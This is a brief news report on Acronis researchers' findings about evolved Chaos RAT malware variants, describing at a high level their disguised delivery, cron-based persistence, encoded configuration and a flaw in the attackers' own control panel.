The Acronis Threat Research Unit (TRU) has identified newly evolved variants of Chaos RAT, a remote access trojan now actively deployed in cyberattacks against Linux and Windows environments. Originally released as an open-source system administration tool on GitHub, Chaos RAT has since been weaponized by threat actors to conduct espionage, data exfiltration, and ransomware operations with high stealth and persistence.
First observed in 2022, the malware has undergone significant evolution. The 2025 samples reveal improvements in obfuscation, broader compatibility, and enhanced evasion techniques. Acronis researchers found one of the latest variants in a malicious archive named “NetworkAnalyzer.tar.gz,” submitted via VirusTotal from India. It likely reached victims through phishing campaigns or compromised websites disguised as offering diagnostic tools for Linux.
Persistent access and risk to open-source ecosystems
These Chaos RAT variants allow attackers to maintain persistent access by embedding cron jobs that fetch updated payloads remotely. This method, commonly used in previous campaigns involving cryptocurrency miners, enables attackers to evolve their malware without reinfection, indicating a long-term foothold strategy.
Also read: India Launches e-Zero FIR for Cybercrime Cases
Significantly, the Acronis team found a critical vulnerability in Chaos RAT’s administration panel, allowing remote code execution on the controlling server. Although this flaw doesn’t directly affect victim endpoints, it raises the possibility of one malicious operator hijacking another’s infrastructure—highlighting security risks within cybercriminal supply chains.
Advanced evasion signals greater challenge for defenders
Where earlier Chaos RAT versions stored sensitive configuration data like IP addresses and ports in plain text, the latest sample uses encoded strings with custom decoding functions to resist reverse engineering. This sophistication underlines the increasing risk posed by legitimate open-source software being repurposed by cybercriminals.
The findings serve as a warning to organizations relying on open-source tools and underscore the importance of regular security audits, behavioral detection, and threat intelligence sharing to preempt emerging threats like Chaos RAT.
